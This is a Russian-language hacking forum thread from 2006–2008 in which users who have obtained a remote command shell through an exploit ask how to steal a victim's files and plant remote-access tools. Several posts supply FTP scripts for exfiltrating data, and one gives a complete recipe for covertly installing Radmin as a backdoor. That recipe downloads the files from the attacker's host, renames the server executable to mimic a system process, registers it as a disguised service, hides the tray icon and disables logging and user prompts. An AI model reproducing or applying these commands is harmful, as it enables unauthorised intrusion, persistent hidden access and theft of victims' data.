Доступ через cmd.exe
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
Доступ через cmd.exe - 2006-07-26 12:53:34
|
|
|
Vladi_boom
Сообщений: 55
Оценки: 0
Присоединился: 2005-03-11 13:09:16
|
Добрый день. Помогите пожалуйста, есть доступ к удаленному компьютеру (с помощью забугорного эксплойта добыл командную строку). Пробую залить Радмина, заливается, в процессах висит, а не подключается. Так вот, как можно слить оттуда данные. И какого посоветуете поставить кейлоггера.
|
|
|
|
|
Доступ через cmd.exe - 2006-07-26 20:11:39
|
|
|
Pupkin-Zade
Сообщений: 9398
Оценки: 1489
Присоединился: 2004-03-10 13:54:16
|
Слить просто - запустить у себя ФТП сервер и на него сскачать от зараженной машины
|
|
|
|
|
Доступ через cmd.exe - 2006-07-27 15:28:00
|
|
|
Vladi_boom
Сообщений: 55
Оценки: 0
Присоединился: 2005-03-11 13:09:16
|
Каким образом? mput? Он требует подтверждения копирования. Какими еще способами можно слить инфу к себе на FTP?
|
|
|
|
|
Доступ через cmd.exe - 2006-07-27 17:20:37
|
|
|
Pupkin-Zade
Сообщений: 9398
Оценки: 1489
Присоединился: 2004-03-10 13:54:16
|
Есть такая страшно сикретная команда ftp…
|
|
|
|
|
Доступ через cmd.exe - 2006-07-28 06:49:14
|
|
|
Vladi_boom
Сообщений: 55
Оценки: 0
Присоединился: 2005-03-11 13:09:16
|
[sm=1.gif], Вообщето я и говорю про ftp. Или mput не под FTP работает [sm=2.gif]. И ещё когда запускаешь (например ftp -i -s:asd.txt - в котором прописано
open ftp.xxx.xx
login
pass
mput path\filename
bye)
на машине юзера кратковременно появляется черное окно. А это не есть гуд
|
|
|
|
|
Доступ через cmd.exe - 2006-08-01 01:54:47
|
|
|
RPN
Сообщений: 5
Оценки: 0
Присоединился: 2006-07-26 09:50:54
|
Ой, я все же спрошу (не посчитайте меня идиотом)
А у тебя в листинге
параметры имеют именно эти же значения, что ты написал или же ты сам свои прописывал?
А вообще если окно черное, то скорей всего запрос до цели не до ходят. Тут мне в голову приходит 2 мысли. Либо ты ftp у себя не коректно поставил, если ваще поставил, либо фаер думает "Что за Х* лезет и что с ним делать?" Но в второй вариант отключим, ты ж все-таки как-то к нему залез
|
|
|
|
|
Доступ через cmd.exe - 2006-08-01 08:32:48
|
|
|
Vladi_boom
Сообщений: 55
Оценки: 0
Присоединился: 2005-03-11 13:09:16
|
Всё. Уже разобрался. Всем спасибо.
|
|
|
|
|
RE: Доступ через cmd.exe - 2006-09-24 13:44:13.336666
|
|
|
*][akep
Сообщений: 144
Оценки: 0
Присоединился: 2006-08-24 17:36:15
|
А у меня похожий вопрос.Как заливать трои на заражонную мащину через cmd?
|
|
|
|
|
RE: Доступ через cmd.exe - 2006-09-25 10:00:08.976666
|
|
|
j0ker_
Сообщений: 609
Оценки: 0
Присоединился: 2005-03-07 15:09:25
|
quote:
ORIGINAL: *][akep
А у меня похожий вопрос.Как заливать трои на заражонную мащину через cmd?
Через FTP
|
|
|
|
|
RE: Доступ через cmd.exe - 2006-09-26 18:56:31.086666
|
|
|
*][akep
Сообщений: 144
Оценки: 0
Присоединился: 2006-08-24 17:36:15
|
quote:
ORIGINAL: j0ker_
quote:
ORIGINAL: *][akep
А у меня похожий вопрос.Как заливать трои на заражонную мащину через cmd?
Через FTP
А если у него и FTP нету..Как я ему тогда залью?
|
|
|
|
|
RE: Доступ через cmd.exe - 2006-09-26 21:07:37.553333
|
|
|
Led_Zeppelin
Сообщений: 20
Оценки: 0
Присоединился: 2006-03-14 19:14:49
|
Должен быть, даже я нуб, знаю =)
|
|
|
|
|
RE: Доступ через cmd.exe - 2006-09-28 06:42:53.133333
|
|
|
Lombardo
Сообщений: 6
Оценки: 0
Присоединился: 2006-09-28 05:38:55.070000
|
собосно рецепт такоф… тока те требуется установить у ся FTP сервер, надеюсь мазгов у тя на то, что бы найти инфу по установке ftp сервера на своей машине, хватит…
если хватило, то выложи в коренвую деректорию (/) радминовские файлы (raddrv.dll и r_server.exe)
создай файл rad.reg, в который впиши собсно это:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin]
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0]
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server]
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\iplist]
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\NtUsers]
"1"=hex:
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters]
"DisableTrayIcon"=hex:01,00,00,00
"NTAuthEnabled"=hex:00,00,00,00
"Parameter"=hex:c3,dc,03,fe,12,1c,b1,b9,8d,ae,76,0a,eb,7c,9b,29
"Port"=hex:a7,02,00,00
"Timeout"=hex:0a,00,00,00
"EnableLogFile"=hex:00,00,00,00
"LogFilePath"="c:\\logfile.txt"
"FilterIp"=hex:00,00,00,00
"AutoAllow"=hex:00,00,00,00
"AskUser"=hex:00,00,00,00
"EnableEventLog"=hex:00,00,00,00
помести его так же в корневуху фиртуальной файловой системмы твоего FTP сервера (туда же, где и raddrv.dll r_server.exe)
если и на это мозгов хватило (хатя уже сомневаюсь что хватило), то воспользуйся своим сплойтом и в консольке поочередно набирай следующую последовательность команд:
х.х.х.х - твой IP адрес в той подседи, где и жертва.
echo open x.x.x.x >.ra
echo user ananymous >>.ra
echo pass bla-bla@tut.by >>.ra
echo binary>>.ra
echo GET raddrv.dll c:\windows\system\raddrv.dll>>.ra
echo GET r_server.exe c:\windows\system\lsasmgr.exe>>.ra
echo GET rad.reg rad.reg >>.ra
echo bye>>.ra
ftp -v -n -s:.ra
c:\windows\system\lsasmgr.exe /install /silence
c:\windows\system\lsasmgr.exe /stop
REG IMPORT rad.reg
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\r_server /v DisplayName /t REG_SZ /d "Service Host Controller" /f
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\r_server /v ImagePath /t REG_EXPAND_SZ /d ""c:\windows\system\lsasmgr.exe" /service" /f
c:\windows\system\lsasmgr.exe /start
del .ra
del rad.reg
если я ничего ненароком не забыл и у тебя все прошло упешно, то открывай радмин и подключайся к компу, который сплойтишь… пароль на доступ "solomandra" (без кавычег)
вот, кажется и все… Если есть здесь присутствующие, которые знают другой, более экономичный в плане времени способ это зделать, то пишите, не стесняйтесь ;-)
PS. То что я тут калякая спроведливо для радмина 2.2, для других версий, собсно, хз.
|
|
|
|
|
RE: Доступ через cmd.exe - 2006-09-28 06:47:38.413333
|
|
|
Lombardo
Сообщений: 6
Оценки: 0
Присоединился: 2006-09-28 05:38:55.070000
|
quote:
ORIGINAL: Led_Zeppelin
Должен быть, даже я нуб, знаю =)
вау… нуб… а что ты еще знаешь? поделись, своим профессионализмом… Ато я тут, всего какой-то системный инженер и специалист по компьютерной безопастности, аспирантура за плечами, а такой новости и не знал… :-/
|
|
|
|
|
RE: Доступ через cmd.exe - 2006-09-28 06:53:20.773333
|
|
|
Lombardo
Сообщений: 6
Оценки: 0
Присоединился: 2006-09-28 05:38:55.070000
|
quote:
ORIGINAL: *][akep
А у меня похожий вопрос.Как заливать трои на заражонную мащину через cmd?
А чем, по твоему, хакерЬ, отличается, с технической стороны дела, заливание радмина на машину, от заливания троя… или есчо чего нить… да хоть свой своп файл туда залей… останется тока переименовать его в pagefile.exe и запустить… если ты не знаешь как переименовать/запустить файл с помощью командного интерпретатора windows - то кури хелп, прилагающийся к маздаю, там ты найдешь много нового и интерестного… ;-)
|
|
|
|
|
RE: Доступ через cmd.exe - 2006-09-28 06:54:55.930000
|
|
|
KPOT_f!nd
Сообщений: 767
Оценки: 0
Присоединился: 2006-09-18 05:16:50.950000
|
quote:
собосно рецепт такоф… тока те требуется установить у ся FTP сервер
Чел мы ему говорили что надо через FTP!
:@ZLOY
|
|
|
|
|
RE: Доступ через cmd.exe - 2006-09-28 06:58:24.883333
|
|
|
Lombardo
Сообщений: 6
Оценки: 0
Присоединился: 2006-09-28 05:38:55.070000
|
quote:
ORIGINAL: KPOT_f!nd
quote:
собосно рецепт такоф… тока те требуется установить у ся FTP сервер
Чел мы ему говорили что надо через FTP!
:@ZLOY
как я понял, для него "через FTP" столь же отдоленное понятие, как для моей мамы… для моей мамы FTP это то, что в браузере начинается с ftp://
|
|
|
|
|
RE: Доступ через cmd.exe - 2007-12-14 14:56:59.940000
|
|
|
Belfigor
Сообщений: 80
Оценки: 0
Присоединился: 2007-05-07 03:37:58.466666
|
у меня проблема вот такого характера заливаю файлы C:\WINDOWS\system>ftp -v -n -s:.ra
ftp -v -n -s:.ra
Связь с 10.xx.xx.xx
open 10.xx.xx.xxx
220 Golden FTP Server ready v1.92
user ananymous
331 User name okay, need password.
230 User logged in, proceed.
GET AdmDLL.dll d:\windows\system\AdmDll.dll
200 PORT Command successful.
Подключение разорвано удаленным узлом.
bye
начинаю просматривать файлы залиты но они по 0 б
14.12.2007 14:29 93 .ra
14.12.2007 14:17 0 drive_rezolution.exe
14.12.2007 14:19 0 sys.exe
14.12.2007 14:27 0 config.bat
14.12.2007 14:29 0 AdmDll.dll
что за хрень ?? кто сталкивался отпишитесь пжл :)
Всё разобрался САМ !!!:)
|
|
|
|
|
RE: Доступ через cmd.exe - 2007-12-19 18:11:37.403333
|
|
|
LamoSS
Сообщений: 15
Оценки: 0
Присоединился: 2007-12-17 22:43:51.056666
|
По рецепту от ломбардо, сделал все как написано, после
ftp -v -n -s:.ra
Ругается на <<нет связи>> + pass blabla@tyt.by — <<неверная команда>>
Что делать-то?
|
|
|
|
|
RE: Доступ через cmd.exe - 2007-12-28 06:43:35.053333
|
|
|
Belfigor
Сообщений: 80
Оценки: 0
Присоединился: 2007-05-07 03:37:58.466666
|
quote:
ORIGINAL: LamoSS
По рецепту от ломбардо, сделал все как написано, после
ftp -v -n -s:.ra
Ругается на <<нет связи>> + pass [email=blabla@tyt.by]blabla@tyt.by[/email] — <<неверная команда>>
Что делать-то?
Ставь себе TYPSoft FTP Server , создавай свой аккаунт и заливай , по принципу
F:\Documents and Settings\sss>ftp
ftp> o
К xx.xxx.xxx.xxx
Связь с xx.xxx.xxx.xxx
220 TYPSoft FTP Server 1.10 ready…
Пользователь (xx.xxx.xxx.xxx:(none)): sss
331 Password required for sss.
Пароль:
230 User sss logged in.
ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
-rwxrwxrwx 1 ftp ftp 2918400 Dec 20 11:46 fly.exe
-rwxrwxrwx 1 ftp ftp 349696 Dec 23 12:54 sex.exe
-rw-rw-rw- 1 ftp ftp 50887648 Dec 23 14:00 Vova_Olya_Teens_F
_chunk_1.wmv
drw-rw-rw- 1 ftp ftp 0 Apr 30 19:00 sss
226 Transfer complete.
ftp: 279 байт получено за 0,00 (сек) со скоростью 279000,00 (КБ/сек).
ftp> Get sex.exe
200 Port command successful.
150 Opening data connection for sex.exe.
226 Transfer complete.
ftp: 349696 байт получено за 0,16 (сек) со скоростью 2227,36 (КБ/сек).
|
|
|
|
|
RE: Доступ через cmd.exe - 2008-01-04 17:50:27.186666
|
|
|
Protec
Сообщений: 3
Оценки: 0
Присоединился: 2007-11-06 01:17:33.943333
|
Народ подскажите плз простейшую вещь,
а то чет не получается.
Значит я через експлойт запустил командную строку и заканектился к себе на фтп сервер.
Вопрос дак как слить папки удаленного компа к себе на фтп?
Не файлы а папки со всем содержимым.
Напишите точный синтаксис плз.
Ситуация - создан файл для конекта с моим ФТП на диске Ц.
Когда я пишу FTP -s:file конекчюсь к своему фтп, и тем времене остаюсь на удаленном компе на диске с?
Так вот в этой ситуации мне надо скапировать файлы с диска d удаленного компа , нужен точный синтаксис.
|
|
|
|
|
RE: Доступ через cmd.exe - 2008-01-04 19:59:14.346666
|
|
|
Protec
Сообщений: 3
Оценки: 0
Присоединился: 2007-11-06 01:17:33.943333
|
Ну что никто не знает как папки со всем содержимым, а НЕ ФАЙЛЫ скапировать.
Надо типо - mput d:\*.* - скопировать на фтп все файлы корневого котолога d. - дальше он неможет открывать вложенные папки.
А как сделать чтоб папки то скапировать со всем.???
И еще например D:\документы - оп все ппц русски не понемает не найдет путь, как с этим тоже боротся?
|
|
|
|
|
RE: Доступ через cmd.exe - 2008-01-04 21:08:48.793333
|
|
|
ra1l
Сообщений: 27
Оценки: 0
Присоединился: 2006-06-03 12:11:25
|
Вы товарисчи все kaht'ом чтоль балуетесь? :) ПОмниться видел где-то гуй-версию для совсем ленивых со встроенным ftp-сервером…
А вообще по теме:
ftp>mget *.exe к примеру скачает все exe-шники с каталога
Также можно посмотреть в сторону команды mdir - сохранит листинг файлов из каталога на сервере в локальный файл, а потом сливать командой fget.
|
|
|
|
|
RE: Доступ через cmd.exe - 2008-01-05 05:06:46.173333
|
|
|
Belfigor
Сообщений: 80
Оценки: 0
Присоединился: 2007-05-07 03:37:58.466666
|
quote:
ORIGINAL: ra1l
Вы товарисчи все kaht'ом чтоль балуетесь? :) ПОмниться видел где-то гуй-версию для совсем ленивых со встроенным ftp-сервером…
А вообще по теме:
ftp>mget *.exe к примеру скачает все exe-шники с каталога
Также можно посмотреть в сторону команды mdir - сохранит листинг файлов из каталога на сервере в локальный файл, а потом сливать командой fget.
а кто тебе сказал что тут балуются kaht'ом ? , тут уже все давно юзают Метасплоит 3 :D
|
|
|
|
|
RE: Доступ через cmd.exe - 2008-01-05 17:08:19.420000
|
|
|
ra1l
Сообщений: 27
Оценки: 0
Присоединился: 2006-06-03 12:11:25
|
quote:
ORIGINAL: Belfigor
а кто тебе сказал что тут балуются kaht'ом ? , тут уже все давно юзают Метасплоит 3 :D
Просто енти дела я забросил еще во времена виндов непатченых без сервис-паков… Про метасплоит слышал, но сам им не пользовалсо..
|
|
|
|
|
RE: Доступ через cmd.exe - 2008-02-22 20:55:56.413333
|
|
|
magistr_bender
Сообщений: 977
Оценки: 0
Присоединился: 2008-02-22 20:10:21.133333
|
народ дайте какойнить скомпиленый сплойт на винду ХР с СП2 только не дком или кахт
|
|
|
|
|
RE: Доступ через cmd.exe - 2008-02-25 18:43:52.316666
|
|
|
Swarovski
Сообщений: 11
Оценки: 0
Присоединился: 2008-02-25 17:59:10.643333
|
есть два компа в локалке,нужно с компа 2 перекинуть файлы на комп 1 так,чтобы комп 2 ничего не заметил
как это сделать? пожалуйста по порядку, и со всеми командами
|
|
|
|
|
RE: Доступ через cmd.exe - 2008-03-09 07:41:19.426666
|
|
|
Father0fRain
Сообщений: 118
Оценки: 0
Присоединился: 2008-02-23 19:57:20.673333
|
Попорядку и со всеми командами?
Хм…ВМЗ!
|
|
|
|
|
RE: Доступ через cmd.exe - 2008-04-08 21:47:39.790000
|
|
|
Kiting
Сообщений: 143
Оценки: 0
Присоединился: 2008-03-03 18:26:44.120000
|
Пипец сто раз уж обсуждалось!
|
|
|
|
|
|
